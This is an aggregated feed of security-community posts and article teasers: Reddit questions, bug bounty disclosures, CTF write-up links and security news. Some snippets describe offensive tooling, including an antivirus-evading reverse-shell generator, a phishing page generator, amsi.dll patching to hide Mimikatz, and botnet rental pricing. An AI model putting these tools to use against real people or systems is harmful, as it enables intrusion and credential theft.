    FreeBuf Consulting Services | Enterprise security awareness education: keeping "Cybersecurity Week" online all year round
    Cybersecurity has become an indispensable part of work and study.
    Lots of stuff in here: music sorted by artist, videos, programs etc.
    http://65.186.78.52/ submitted by /u/Akhenaten1049

    Want to learn cyber security
    Greetings. I'm wondering if it's possible to get into the cyber security field without a degree. I'm in my early 40s and I hate my blue collar career. I've always loved IT stuff and have been very good at it. I just never focussed on my school studies in the past (due to late diagnosis of ADHD). I did take some courses way back when I was laid off, such as A+ and Network+, which I taught myself and had certifications for (now long expired). I know I could do well with this but I'm wondering, since I'm older, that it might be too late to follow this dream. I can't go to school full time since I work full time. Something along the lines of ethical hacking sounds interesting to me. Is it possible to learn on my own and get into a cyber security career? Where should I start and what certifications would I need? Any tips or advice from anyone that's been in a similar situation? I'm in Canada if country makes a difference. Thanks! submitted by /u/Darth_Rayzor
    Can I be infected by copying a bad file?
    I copy a potentially malicious file and paste it in a sandbox. Am I going to get infected by copying the file from, say, an email? How else could I get it to a sandbox? submitted by /u/papervault
    Please explain the risk: VPN blocked from remote computer.
    I'm not sure if this is the right place to ask the question, sorry if it's not. It's my work's new policy that a computer cannot have a VPN connection into the office from a computer being accessed remotely. Example: I have WorkPC in my closet; it's got lots of RAM and CPU, and I only install work apps on it. I have my HomePC that I use for most things that is mine, and I have a nice multi-monitor setup to go with it. I used to sit at HomePC and remote desktop to WorkPC to do my work (both in my local network), but to do the work, once I'm connected to WorkPC, I connect WorkPC's VPN into work so I can check out licenses and stuff. This is as of today blocked, so now I have to figure out how to move all my computers around to be able to get any work done. What is the threat they are trying to prevent? Is it a realistic one? (How annoyed should I be right now?) Any ideas how I should have my PCs set up? I also wanted the flexibility to connect to WorkPC from a laptop so I could do work from any location in my house, but this seems to break that too... it seems like my only solution is a work laptop + KVM switch + annoyance? Thanks. submitted by /u/rLarc
    Getting more and more emails about suspicious activity on various accounts?
    It all started last week with Ubisoft and then a few days apart I keep getting the same thing from Microsoft, Mega and PayPal. I haven't clicked on any suspicious links and I do use a VPN only for a particular website, but never the ones I mentioned earlier and I haven't gotten on them in months. I checked my email address in https://haveibeenpwned.com and it was found in 5 breaches, so I guess I'm waiting for a 5th email telling me one of my accounts encountered suspicious activity. Right now I'm taking all safety precautions and changing my passwords and enabling Two-Factor Authentication where possible. But I'm still wondering why this is happening? submitted by /u/throacco19
    IDOR on TikTok Seller
    TikTok disclosed a bug submitted by aidilarf_2000: https://hackerone.com/reports/1509057 - Bounty: $500
    CSRF Account Takeover
    TikTok disclosed a bug submitted by s3c: https://hackerone.com/reports/1253462 - Bounty: $2373
    IDOR allowing to read another user's token on the Social Media Ads service
    Semrush disclosed a bug submitted by a_d_a_m: https://hackerone.com/reports/1464168 - Bounty: $2000
    From Hunted to Hunter
    Please note: this article contains potentially triggering stories about child sexual abuse. Continue reading on Medium »
    L’espion Challenge || CyberDefenders
    Hello guys, this is Abdelrahman Attia. Today we will solve the L’espion Challenge from CyberDefenders. Continue reading on Medium »
    StepSecurity releases tool that it used to improve security of 30 critical open-source projects…
    PortSwigger Web Security Academy Lab: SQL injection UNION attack, retrieving data from other tables
    How To Hack With SQL Injection Attacks! DVWA low security — StackZero
    IW Weekly #16: AWS Vulnerability, Threat Hunting, Reflected XSS, Pentesting Resource, Command…
    Disrupting SEABORGIUM’s ongoing phishing operations
    submitted by /u/SCI_Rusher
    I will live-create a POC for CVE-2022-26923
    Tomorrow (08.17, at 20:00 EEST) I will stream how I develop a POC for CVE-2022-26923 on my Twitch: https://www.twitch.tv/lsecqt Feel welcome, guys! submitted by /u/lsecqt
    A Deep Dive Into Black Basta Ransomware
    submitted by /u/CyberMasterV
    SOVA malware is back and is evolving rapidly
    submitted by /u/Frank538
    My Recon Tools
    Hello Amazing People, Continue reading on System Weakness »
    DOM XSS ON A GOV DOMAIN BYPASSING WAF
    Welcome back readers. I hope everyone is doing well. I have decided to do a writeup on a DOM Based XSS I recently found bypassing WAF… Continue reading on Medium »
    Cross-Site Scripting (XSS) Attacks
    Cross-site scripting (often shortened to XSS) is a common security vulnerability that is more prevalent in web applications. Continue reading on Medium »
    Monitoring Linux host metrics with the Node Exporter information disclosure $350
    Censys Continue reading on Medium »
    Apache Rootkits RCE
    Author: lalualowan Continue reading on Medium »
    Interview: The XSS Rat
    Bug bounty hunter, Teacher and Father Continue reading on Medium »
    IW Weekly #16: AWS Vulnerability, Threat Hunting, Reflected XSS, Pentesting Resource, Command…
    Hey 👋 Continue reading on InfoSec Write-ups »
    SecWiki News 2022-08-16 Review
    [HTB] Antique Writeup by 0x584a. For more of the latest articles, visit SecWiki
    Multiple cloud vendors impacted by PostgreSQL vulnerability that exposed
    Article URL: https://portswigger.net/daily-swig/multiple-cloud-vendors-impacted-by-postgresql-vulnerability-that-exposed-enterprise-databases Comments URL: https://news.ycombinator.com/item?id=32483937 Points: 1 # Comments: 0
    Things you can find in RAM that are useful in investigations.
    submitted by /u/DFIRScience
    The Hitchhiker's Guide to DFIR: From Beginners and Experts
    I'm very excited to share the first edition of what's been in the works for almost 5 months now, "The Hitchhiker's Guide to DFIR", a project started by Andrew Rathbun as a proof of concept for a crowdsourced and open-source approach to publishing. The idea was simply to gather a bunch of people willing to write a chapter of their own choosing covering their stories, knowledge or experiences within the domain of DFIR. V1 contains chapters from some well-known forensicators, as you might already know them. You can also find my chapter indexed 8th and titled "Artifacts as Evidence", where I share some of the artifacts that I encountered in the wild. What began as a fun and collaborative project has now resulted in this small DFIR book. I hope it sparks the interest of beginners, helps the practitioners and is refreshing for the professionals! Note: This is a free distribution, you don't have to pay anything on the Leanpub landing page. Hitchhiker's Guide to… by Andrew Rathbun et al. [PDF/iPad/Kindle] (leanpub.com) submitted by /u/Nisarg12
    family bible records
    submitted by /u/PM_ME_TO_PLAY_A_GAME
    You. Are. Welcome. 🤗
    submitted by /u/ManaHoney504
    Various Music
    https://www.7xr.nl/Music/ There's also https://www.7xr.nl/games/ for games submitted by /u/neheb
    Index of /Files/
    submitted by /u/taramj13
    FreeBuf Morning Report | Cyber threats surge after the Trump "raid"; Douyin launches source-tracing and other features to combat false information
    The FBI has issued a warning that cyber threats against law enforcement officials have surged since last week's FBI raid on former President Donald Trump's Mar-a-Lago residence in Florida.
    A macOS vulnerability could let attackers access all files on a Mac
    Security researchers found that an injection vulnerability related to how macOS handles system software updates could let attackers access all files on a Mac device.
    New PyPI package delivers fileless Linux malware
    Sonatype researchers discovered a new PyPI package named "secretslib", designed to drop a fileless cryptominer into the memory of Linux machines.
    Analysis of the characteristics of new activity by the South Asian Patchwork APT group
    Author: Knownsec (知道创宇) 404 Lab APT Advanced Threat Intelligence Team, K & Nan. 1. Overview: Patchwork is a South Asian APT group that has been active since December 2015. The group has long carried out cyber-espionage attacks against government, healthcare and scientific research targets in China, Pakistan and other countries in the South Asia region. "Patchwork" is a rather interesting name: it comes from the group's arsenal being patched together from open-source code (underground forums, the dark web, GitHub, etc.). Knownsec 404 Lab APT Adv...
    Want to LEAVE Pentesting
    FYI - crosspost to get more opinions. Hi all - I know usually the posts are "I want to get into pentesting". I have the opposite predicament. I'm an internal OT/IT Pentester. I perform assessments on pretty much everything: SCADA, DCS, Web Apps, Authentication systems, Network, Active Directory, you name it. I've been doing this for about a year now and can see myself doing it for maybe 1 more year. Responsibilities other than pentesting: Purple team engagements with SOC; build out red team infrastructure for testing exploits/TTPs; Python, PowerShell, bash scripting/automation for tooling/workflows. Reasons I'd like to leave: I travel about 6-7 times a year. I have a good balance and although I'm young - I prefer a role that is more structured and eventually I would prefer to tra…
    What should the periodic cyber security report look like?
    Hi, I have been asked by our company’s head of cybersecurity to prepare a monthly report related to cybersecurity technologies. What things should the report contain? Can anyone share suggestions or a sample report? submitted by /u/techno_it
    Confused on what point to begin learning
    How much code/what languages should I know beforehand, before indulging in learning hacking methods and Red/Blue strategies and trying to get certified in Cybersecurity, to be able to breeze by and not struggle as much in comparison to not knowing any coding skills? submitted by /u/fawzi97
    Can TikTok on Android access my MFA code in Authy or Google Authenticator?
    I've read some really bad articles saying that TikTok is overly permissive on Android. Could TikTok in theory access the MFA codes on my phone if I scanned the QR codes to add them into either Authy or Google Authenticator before I installed TikTok? submitted by /u/cryptocritical9001
    How many goals do symmetric and asymmetric encryption achieve?
    Authentication, Integrity, Non-Repudiation, Confidentiality. Is my question even correct? Because I'm seeing lots of books saying symmetric encryption can't provide non-repudiation. So, can we generalize for all symmetric cryptography? And what about asymmetric? Does it achieve all goals? submitted by /u/syavage
    Data Security and Privacy: Using a Dedicated Proxy Server and NordVPN
    r/AskNetsec As the title says, I'm trying to get the most secure and fastest connection possible. I work in the financial services industry and stream in my off-time, so I have a couple of questions about online privacy and security. Is there a benefit of using BOTH a dedicated proxy server and VPN at the same time? In my mind, the proxy server hides my IP address, then the VPN both hides the proxy IP address and encrypts the data. I set up my dedicated proxy server through Windows 10 directly. No issues whatsoever. Is this the best and most secure method? I have 5 dedicated proxy servers and am only using one that's managed by Windows 10? Several apps are set up through NordVPN with tunneling and a kill switch, including Tor, Signal, OBS, and several other apps. When I try this with Google Chrome all while using my proxy server, it doesn't connect to the internet? Is there a fix for this? Should be noted, I'm able to use and connect to the internet through Chrome using my proxy server if I'm using the NordVPN Chrome extension - but the tunneling and kill switch aren't in place? Is there a fix for this? The most secure way of browsing the internet is obviously using Tor with my proxy and VPN, but are there any other methods of increasing my privacy and security outside of using a dedicated proxy server and VPN at the same time? I'm open to suggestions of any sort. submitted by /u/fletchketchem
    Availability and pricing of Botnets (Botnet-as-a-Service)
    Hi r/AskNetsec! I'm preparing myself for a presentation regarding bots and botnets. I will be talking about types of bots like good bots, bad bots, and what they can do, how you can protect yourself against them, some information about popular botnets that were used in recent years, how IoT devices are insecure and can be used to attack (Mirai bot example), etc. One of my talking points is how in recent years the prices of renting servers and services went down, which makes creating botnets more affordable than ever. I wanted to provide some examples with pricing but this is where I stumbled into a wall. I've looked over more popular underground marketplaces and found only offers for buying bots to create your own botnet, training materials on how to create botnets, services for generating likes, subscribers or discord bots or DDoS. Nothing related to renting botnet infrastructure for attacks like spamming, credential stuffing, ransomware, password bruteforcing, etc. During my research I've found some articles regarding this topic, but they are pretty old and the prices themselves are all over the place. https://www.zdnet.com/article/study-finds-the-average-price-for-renting-a-botnet/ https://www.secplicity.org/2017/03/07/know-much-costs-rent-iot-botnet/ https://datadome.co/learning-center/what-is-ddos-booter-botnet-booter/ My kind question to you all is if you could provide me with some info on the pricing or screenshots of the offers if you have seen any recently? Direct links are most likely against this subreddit's rules, so only price and botnet type info, and for screenshots the seller and any other details that could point to the particular marketplace/seller can be blurred. Thanks! submitted by /u/vlot321
    Process Behaviour Anomaly Detection Using eBPF and Unsupervised-Learning Autoencoders
    submitted by /u/sanitybit
    Tracking Internet facing Industrial Control System devices
    submitted by /u/Mysterii8
    Why Action Bias Is Damaging Your Security Response
    submitted by /u/mesok8
    EvilPLC Attack: Using a PLC to Gain Code Execution on Engineering Workstation
    submitted by /u/derp6996
    Attacking Google's Titan M Security Key with Only One Byte
    submitted by /u/sanitybit
    HijackLibs: an open-source, community-driven project tracking DLL Hijacking opportunities in Windows
    submitted by /u/sanitybit
    STrace: MIT Licensed Windows Reimplementation of DTrace
    submitted by /u/sanitybit
    NthLink VPN found to be regular shadowsocks using same pre-shared keys for all users
    submitted by /u/yarmak
    HacktheBox [Devzat]
    Devzat was a Medium ranked box on the HacktheBox platform involving heavy enumeration. The initial foothold is gained by identifying a… Continue reading on Medium »
    HacktheBox[Meta]
    Meta was a medium machine on HacktheBox. By identifying an additional virtual host, the user is able to find an API running exiftool… Continue reading on Medium »
    HoaxShell — Reverse Shell
    HoaxShell is a tool written in Python that generates payloads capable of bypassing Windows Defender and other antivirus products… Continue reading on 100security »
    CRTP Review
    TLDR; Continue reading on Medium »
    eLearnSecurity Penetration Testing Professional ( eCPPT ) Review
    eCPPT/PTP Writeup Continue reading on Medium »
    New Bug Bounty Alert: Welcome Solace Finance!
    After an exciting partnership announcement, we welcome Solace Finance as the newest bug bounty vault! Continue reading on Medium »
    Vega Bug Bounties
    Starting today, Monday 15th of August 2022, the Vega Protocol is officially launching the Vega Bug Bounty Program! Continue reading on Vega Protocol »
    FFUF Tool 9 tips, File Inclusion Guide, Code Injection Guide | MONDAY HACKING | BotAmi | EPISODE…
    Hello, Hackers 👋👋 Continue reading on Medium »
    How to **actually** use Amass more effectively — Bug Bounty
    99% of bug hunters only use 1% of Amass’ potential… Continue reading on Medium »
    Salesforce bug hunting to Critical bug
    Or how I learned that some bugs are truly rare Continue reading on InfoSec Write-ups »
    SQL Injection
    In this section, I’ll explain what SQL injection is, describe some common examples, explain how to find and exploit various kinds of SQL… Continue reading on Medium »
    Business Logic Vulnerability via IDOR
    Exploiting a Logic Vuln via IDOR. #Bugbounty Continue reading on Medium »
    CHFI v 10 new topics
    I bought the course for CHFI v9 from EC-Council a while ago and delayed writing the exam till now. Now the exam is based on v10 and I know most of the content is the same, but the 2 newly added modules are missing: IoT Forensics and Dark Web Forensics. Does anyone know of any good resources where I can read about these topics myself? Any help would be much appreciated, thank you. submitted by /u/Top-Law8118
    Demonstrating Basic Computing Knowledge
    I have the opportunity to apply for a digital forensics position that will train. There is no digital forensics experience required. That being said, it is very competitive. If I wanted to gain some tangible skills to demonstrate I have some knowledge of computing, would you recommend getting CompTIA A+, S+, N+? Any others? I know these do not necessarily correlate directly with digital forensics. submitted by /u/invictusliber
    Giving away some wireless gear (alfa cards, d-links) to two people
    Hey r/ExploitDev - I was clearing out some things from my office this weekend and came across two Alfa 802.11b/g wireless cards and two DIR-601s. I used these a while back when I was doing the OSWP labs. [Timestamp](https://i.imgur.com/SvQhRyn.jpg) I spoke with the mods and they are cool with me doing a giveaway raffle for these. There is nothing fancy about the routers or the Alfa cards (they are both old commodity hardware) but they could be beneficial if you are looking to take the OSWP or starting to study the basics of 802.11 attacks. Raffle terms: comment to enter; RedditRaffler will be used to select two winners approximately 24 hours from now; I'll contact the winners via DM and ship you one Alfa card and DIR-601 "kit" seen in the above timestamp; I'll pay for the shipping costs; CONUS-only shipping; minimum account age is 30 days. Thanks! submitted by /u/Bowserjklol
    Update Zoom for Mac now to avoid root-access vulnerability
    Article URL: https://arstechnica.com/information-technology/2022/08/zoom-patches-mac-auto-updater-vulnerability-that-granted-root-access/ Comments URL: https://news.ycombinator.com/item?id=32472030 Points: 14 # Comments: 2
    SecWiki News 2022-08-15 Review
    [The Road to Automated Bounties] A summary of earning 10,000 yuan in the first 3 months by BaCde; SecWiki Weekly (Issue 441) by ourren; The road to writing your own ModSecurity rules by SecIN Community; SANS 2022 Threat Hunting Survey Report by Avenger. For more of the latest articles, visit SecWiki
    FreeBuf Morning Report | CAC publishes algorithm filings for WeChat, Taobao, Douyin and others; two Redmi phones reported to have security vulnerabilities
    The Cyberspace Administration of China publicly released the names and filing numbers of domestic internet information service algorithms, including the algorithms of several large companies and products.
    Black Hat 2022 | Three major trends are now settled worldwide
    Black Hat is widely regarded as the "Oscars of the hacking world"; it focuses on the current real-world security landscape and shares cutting-edge security research, security products and solutions.
    Black Hat 2022 unveils 14 major new research findings
    PCMag picked 14 major research results from this year's conference; this article takes a look at each of them.
    CISA and FBI issue joint advisory warning of Zeppelin ransomware attacks
    Zeppelin ransomware first appeared in the threat landscape in November 2019.
    No password at all! Survey finds more than 9,000 VNC servers worldwide at risk of exposure
    On hacker forums, demand for access to critical networks through exposed or cracked VNC is high, and in some cases such access can be used for deeper network penetration.
    US sanctions cryptocurrency mixer; Tornado Cash employee arrested
    Dutch authorities announced that the US had arrested, in Amsterdam, a software developer who worked on the cryptocurrency mixer.
    Killnet hacker group claims to have "breached" Lockheed Martin
    The Moscow Times reported that the hacker group Killnet claims to have launched a large-scale DDoS attack against aerospace and defense giant Lockheed Martin.
    Google fined 60 million dollars for collecting Android location data
    The Australian Competition and Consumer Commission said Google was fined AU$60 million (about RMB 288 million) for misleading users when collecting data.
    Salesforce bug hunting to Critical bug
    Or how I learned that some bugs are truly rare Continue reading on InfoSec Write-ups »
    Irremovable guest in facebook event — Facebook bug bounty
    PortSwigger Web Security Academy Lab: SQL injection UNION attack, finding a column containing text
    ConINT 2020 and CTF in Five Swinging Iced Girrafes!
    OK so here goes! The first of my throwback sessions! Let’s go back to the weekend of 17th October 2020! Continue reading on Fitness Drinking Security Code »
    Burp2Malleable - turn HTTP requests into MalleableC2 profiles
    submitted by /u/CodeXTF2
    Mega Cooking Recipe "open" dir - looking for possible ways to get this downloaded
    http://www.justbeefrecipes.com - plus 18 more websites, all accessible via the top bar. 91.3K recipes across all sites. Plain text, no images, basically a somewhat fancy opendir. Important to note that these sites only allow 200 requests per IP per day; however, this is on a per-site basis. I stumbled across this while looking for more sources to put in version 2 of my cooking recipe archive. However, the aforementioned limit of 200 files per day is not at all ideal. wget and other utilities will carry on downloading after the limit; however, the files downloaded will, instead of recipe content, contain an error mentioning this limit. I have a VPN that I can switch IPs with, which works fine, but the real issue is getting these download utilities to pick up where they left off. I haven't yet found a way to force wget or curl to pause downloading after 200 files and let me switch IPs. This would also get pretty tedious very quickly - 91K recipes means around 455 manual IP switches in all (assuming no cross-site IP usage). So I'm curious - has anyone else run into a site like this, and found a way to download it in an efficient manner? submitted by /u/WAUthethird

    Evade Windows Defender Mimikatz detection by patching the amsi.dll
    submitted by /u/sanitybit
    DC30 Mainframe Buffer Overflow workshop. This docker container has everything you need to learn how to do MVS buffer overflows.
    submitted by /u/sanitybit
    Process injection: breaking all macOS security layers with a single vulnerability
    submitted by /u/sanitybit
    wtfis - A commandline tool that gathers information about a domain or FQDN using various OSINT services and displays them formatted for human consumption.
    submitted by /u/sanitybit
    From Oscilloscope to Wireshark
    submitted by /u/sanitybit
    Hacking Zyxel IP cameras to gain a root shell
    submitted by /u/hydrogen18
    Threatest, a Go framework for end to end testing threat detection rules
    submitted by /u/thorn42
    nuclear power documents
    submitted by /u/PM_ME_TO_PLAY_A_GAME
    Tonic
    submitted by /u/Plastic_Preparation1
    Quite a few movies in 720p mp4 format, mostly from 2016-17
    submitted by /u/draebor
    Grabbing files from Google Drive
    Looked over the posts here and not finding what I am looking for. Is there an easier way to grab files from Google Drive other than waiting for the files to zip and then download? submitted by /u/belly_hole_fire
    If proxychains is not encrypted, why is it used?
    Can its protocols be changed? submitted by /u/Iam_really_need_name
    Best certification/courses for network security?
    Looking for the best courses/certs to get to improve my network security skills. Things similar to monitoring packets for malicious activity like DNS beaconing, investigating firewall IDS/IPS events, NGFW configuration, best practices, etc. submitted by /u/Professional-Dork26
    Building a Home Lab
    Hey everybody. Currently I am trying to set up a virtual environment so that I can practice on it. I do have a couple of questions though. How would you guys recommend setting up a homelab? I use Fedora as my daily driver and then I have a Kali VM installed with KVM/QEMU via Virt-Manager. My initial plan was to whip up a Windows 10 VM in VirtualBox on my spare Mac and then attack it with my Kali machine. I was going to set up the Windows box as 'Host-Only' so that it is isolated. But all the research and videos I have watched only show how to set up a 'Host-Only' network between two virtual machines on the same host computer. Is it possible to set up the scenario that I am describing? To isolate a Windows machine on VirtualBox and attack it from my other computer using Virt-Manager? I am under the impression that my 'vulnerable' box should be on the Host-Only network mode just for security reasons. But if that is the case, how would I connect to it to attack it? I am pretty sure that what I am describing makes sense, but if it turns out that I am wrong and it doesn't, I do apologize! I haven't been on my ethical hacking journey for very long, so I am sorry if this is a dumb question or if it has a very simple answer. Thanks! TL;DR: How to isolate a Windows VM on VirtualBox within my Mac OS host and be able to attack it via my Kali machine via Virt-Manager on my Linux host. P.S. Sorry if this isn't the right sub - I tried posting in an ethical hacking and a cybersecurity sub, but the first one hasn't gotten any replies and the latter deleted my post. Just trying to get some information on this so I can practice. submitted by /u/strings_on_a_hoodie
    How likely is it to catch a virus nowadays, assuming a standard, up-to-date antivirus?
    I assume many people don't necessarily follow best practices in the digital world - download and run executables from dubious websites, for example. I wonder how prevalent it is for them to catch malware nowadays, provided they have a standard, up-to-date antivirus. Does most widespread malware exploit zero-day attacks and become detected by antiviruses after a few hours/days? How prevalent is more sophisticated malware that can stay undetected for weeks/months? Specifically, how hard is it for attackers to devise keyloggers and ransomware? submitted by /u/Curious-Brain2781
    Help me take a step forward in my career
    I’m a software dev with some years of experience. I’ve always worked for security companies and on security products, so I have lots of exposure to the industry. I find that I like security way more than I like writing code. I’d like to make it my full time job. However, financially I can’t go back to square 1. I am looking for advice on how I can pivot to a true security career while not losing all of the seniority that I’ve built up. I think that security engineer is a logical spot to jump to, but I’m unsure. I am also curious if there are certs that I should pursue. My company will pay for them, but many seem to be either focused on red team (OSCP) or management (CISSP). submitted by /u/Weary_Drummer2211
    Win NTFS image question
    I have an image of an HD from a 1-year-old Dell desktop. It appears to be Windows NTFS but there are no Users folders; many other typical Windows folders are missing. The drive only has 9.5 GB of data out of 1 TB. It is not zeroed, and the image is obviously not bootable. Trying to figure out what could have happened. submitted by /u/SquareEastern4454
    INDUSTRIAL SSD, 256GB, MLC,
    submitted by /u/Simply4U2bu
    From Open Redirect to Reflected XSS manually
    # For the purpose of this write-up, and the integrity of the company, we’ll consider that the target we’re testing is: >… Continue reading on Medium »
    Internal Bug Bounty’s & The Importance of Timing
    Read Time: 3 minutes Continue reading on Medium »
    Step 18: Information Gathering — Web Edition
    Been a few days folks, apologies. Orientation at the new job, getting more apartment stuff… it finally feels cozy and homely! Continue reading on Medium »
    How I got into the United Nations’ Hall of Fame
    Continue reading on Bug Zero »
    User-Agent — How to change it from the browser?
    The User-Agent request header is a characteristic string that lets servers and network peers identify the… Continue reading on 100security »
    PyPhisher — Phishing Generator
    PyPhisher is a phishing page generator for more than 78 sites, including Facebook, Gmail, Netflix, TikTok, Twitter, Spotify and many more. Continue reading on 100security »
    How to OSINT Russia? part 2
    Tips on searching individuals and businesses through Russian websites. Continue reading on Medium »
    Disinformation Days
    While I’m busy finding my way in open source research — and tip of the hat: I’m happy to announce that I’m already contributing to a number… Continue reading on Medium »
    SPY NEWS: 2022 — Week 32
    Summary of the espionage-related news stories for the Week 32 (August 7–13) of 2022. Continue reading on Medium »
    SecWiki News 2022-08-14 Review
    The dream of cloud isolation by ourren; Introductory cloud security materials by 路人甲; netspy, a tool for quickly probing reachable intranet segments by 路人甲; SnakeYaml deserialization by 路人甲; Implementing an Executor memory webshell by 路人甲; How I Hacked my Car by ourren. For more of the latest articles, visit SecWiki
    FreeBuf Morning Report | First attack techniques against the Starlink satellite network revealed; Instagram reported to track users' web activity
    For just $25 in small parts, researchers built a hardware hacking tool that runs arbitrary code on a Starlink satellite dish.
  • Open

    How useful is CVSS Score in CVE triage – The CVSS who cried wolf
    Article URL: https://inthewild.io/blog/how-useful-is-cvss-score-in-CVE-triage Comments URL: https://news.ycombinator.com/item?id=32459335 Points: 1 # Comments: 0
  • Open

    WiFi Standard 802.11ac Packet Analysis
    submitted by /u/tbhaxor [link] [comments]
  • Open

    Post which compared all exploit dev certifications
    Around a month or so ago I saw on this subreddit a post which had a spreadsheet with all the exploit development certifications compared by topics which they covered but I can't seem to find it now. Does anyone have a link to that post or spreadsheet? If so I'd highly appreciate it. Thanks in advance. submitted by /u/xor_eax_eax_ [link] [comments]

  • Open

    Lina Lau: How to Reverse Engineer and Patch an iOS Application for Beginners: Part I
    submitted by /u/KeepYourSleevesDown [link] [comments]
  • Open

    OSINT Tool to know
    In the previous blog we learned what OSINT is; now we need to know what tools are used to do OSINT. Continue reading on Medium »
  • Open

    Pentesting vs Bug Bounty
    Can pentesters instantly become great bug bounty researchers? It may not be as trivial as one might think Continue reading on Medium »
    How I earned a $7000 bug bounty from Grab (RCE Unique Bugs)
    Table of Contents Continue reading on Medium »
    My blackhat stories- How I hacked my school and got a CVE for it.
    Intro: Continue reading on Medium »
    Bypassing unexpected IDOR
    Hello guys, I am back again with another writeup on my very recent bug finding on HackerOne Private VDP. In this writeup I am gonna tell… Continue reading on Medium »
    Escalating Open Redirect to XSS
    Hello everyone. Myself Sagar Sajeev. Continue reading on Medium »
    Latest Bug Bounty Programs, this Aug, Proud Year 2022
    Have you heard about the daily bug bounty programs that invite programmers to find out issues with the software or app they have developed… Continue reading on Medium »
    An Unusual Tale of Email Verification Bypass
    Hey Guys. I’m Sagar Sajeev . Continue reading on Medium »
    Directory Traversal: An Explanation [PT/BR]
    Today I decided to do something a bit different; normally I am more in the habit of writing write-ups than writing about the vulnerabilities… Continue reading on Medium »
  • Open

    PyPhisher: a phishing page generator
    PyPhisher is a phishing page generator covering more than 78 sites, including Facebook, Gmail, Netflix, TikTok, Twitter, Spotify and many more. Continue reading on Medium »
    MSIEXEC: Windows Exploitation
    Using msfvenom we can generate MSI payloads that can help in the process of exploiting Windows, and in this article… Continue reading on 100security »
    MSFConsole: Capturing Passwords
    msfconsole has an auxiliary module that lets you start services such as FTP, Telnet, VNC, SMB, HTTP, MSSQL, PostgreSQL… Continue reading on 100security »
  • Open

    What is your process for investigating a suspicious link/URL?
    Details around thought process, tools and methods used would be highly appreciated! Even better if the answer is geared towards an enterprise/SOC environment. submitted by /u/Jaruki_Jurakami [link] [comments]
    What is bloom.exe written in?
    Bloom.exe seems to be adware, or a trojan. Malware, of some kind. What I'm wondering is if someone has downloaded it to somewhere it won't work... and looked at its code. And if so, what the language is. I have been getting into scripting... and I'm quite curious about what language the more modern malware is scripted in. Even something as simple as a screenshot will probably satisfy my curiosity. submitted by /u/NinaMercer2 [link] [comments]
    Is it possible to block network access for a specific app on iOS?
    I included lots of details and context in my previous attempt to post this question, but it was deleted by mods due to not being narrowly cast, so I've tried to address that by asking a yes/no question even though my question is actually more about "how". I can reply with details but won't include them here for fear of my question being deleted again. submitted by /u/hc5u [link] [comments]
    Disabling 2FA requires only password knowledge in a google account. How to mitigate this?
    Say a hacker gets control of my computer and has access to my keystrokes. He can change any security settings of the Google account - disable 2FA, change the password, revoke backup codes, etc. - all this just by authenticating via the password (which he can get from the keystrokes). Google doesn't require the 2nd-factor authentication in this scenario (since the session is trusted - it's from my PC). I worry that this kind of attack might happen, and make me lose my Google account. Is there a way to somehow mitigate this risk and enforce 2FA for every such critical action? Reference: https://www.infoq.com/news/2020/07/google-password-2fa-woes/ Thanks! submitted by /u/Curious-Brain2781 [link] [comments]
    A question for somebody who knows how to hack an iPhone
    Okay so I have this old neighbour (let's call him A) that I had added on my Instagram account a while back, but then we fell out and I blocked him. But then a couple months ago I received a message from an account which went by his name and he asked me to give him my Instagram account's password and my phone number to help him recover his hacked account, and after going back and forth with him I foolishly gave it to him. But after 30 minutes I realised he was going through my DMs so I immediately blocked the account and changed all my passwords. Then I DMed A's account, the one that I had blocked and was sure was his, and he claimed that it wasn't him and it was someone who was doing this to multiple of his followers. I have reason to believe that this is not true because I wasn't even following him at the time and I believe the alleged fake account was him all along, but I got past it and forgot about it. Now, just today I received a text from a stranger who is saying that he got hold of A's phone and found my chats and pictures in his gallery, and is claiming that A somehow, by using my phone number and my Instagram account, hacked into my phone and any and every picture that I take on my phone is being saved on his phone. Now this stranger is asking for my lockscreen passwords and stuff, telling me that he will help me out and "disconnect the septor" so that A no longer has access to my iPhone, but I ofc just blocked him because I am not ever giving any of my passwords out again and I think this too is a ruse. Although I can't help but be concerned for my privacy, so is it possible that someone can gain access to my iPhone's camera and gallery and stuff just through my Instagram account? I would really really appreciate some help here and an honest answer because I have no knowledge of anything regarding hacking and other things related to it. Thank you for reading. submitted by /u/Praise-bingus111 [link] [comments]
  • Open

    Ingress-nginx annotation injection allows retrieval of ingress-nginx serviceaccount token and secrets across all namespaces
    Kubernetes disclosed a bug submitted by amlweems: https://hackerone.com/reports/1378175 - Bounty: $2500
  • Open

    SecWiki News 2022-08-13 Review
    Operation Mole (鼹鼠行动): analysis of a large-scale attack campaign targeting QNAP network storage devices by ourren. For more of the latest articles, visit SecWiki
  • Open

    How I Hacked my Car
    submitted by /u/CyberMasterV [link] [comments]
    How Cisco got Hacked - Tracking the attacker steps and the logs it generates
    submitted by /u/jwizq [link] [comments]
  • Open

    Process injection breaking all macOS security layers with a single vulnerability
    Article URL: https://sector7.computest.nl/post/2022-08-process-injection-breaking-all-macos-security-layers-with-a-single-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=32449426 Points: 2 # Comments: 0
  • Open

    Who "Owns" Your Infrastructure?
    That's a good question. You go into work every day, sit down at your desk, log in...but who actually "owns" the systems and network that you're using? Is it you, your employer...or someone else? Anyone who's been involved in this industry for even a short time has either seen or heard how threat actors will modify an infrastructure to meet their needs, enabling or disabling functionality (as the case may be) to cover their tracks, make it harder for responders to track them, or to simply open new doors for follow-on activity. Cisco (yes, *that* Cisco) was compromised in May 2022, and following their investigation, provided a thorough write-up of what occurred. From their write-up: "Once the attacker had obtained initial access, they enrolled a series of new devices for MFA and authenticated…
  • Open

    Filesystem Fuzzing and Responsible Disclosure
    Article URL: https://lwn.net/SubscriberLink/904293/deab9aedc5522142/ Comments URL: https://news.ycombinator.com/item?id=32448962 Points: 1 # Comments: 0
  • Open

    ww1 footage in .swf format
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    An interesting voice confusion discovery in Meta bug bounty
    No content preview
    Server Side Template Injections By Hashar Mujahid.
    No content preview
  • Open

    Server Side Template Injections By Hashar Mujahid.
    In this blog, we are going to learn about what server-side template injections are and how they work by solving PortSwigger's labs. Continue reading on InfoSec Write-ups »
    How I found an XSS vulnerability via using emojis
    An unusual type of Cross-Site Scripting vulnerability made by emoticons Continue reading on Medium »
    Guide to participating in the SynFutures V2 testnet
    Overview of SynFutures Continue reading on Medium »
    File Upload Bypass to RCE == $$$$
    Multiple ways to Bypass a File upload feature and chain it to an RCE. Continue reading on Medium »
    Amazon Cognito misconfiguration lead to account takeover
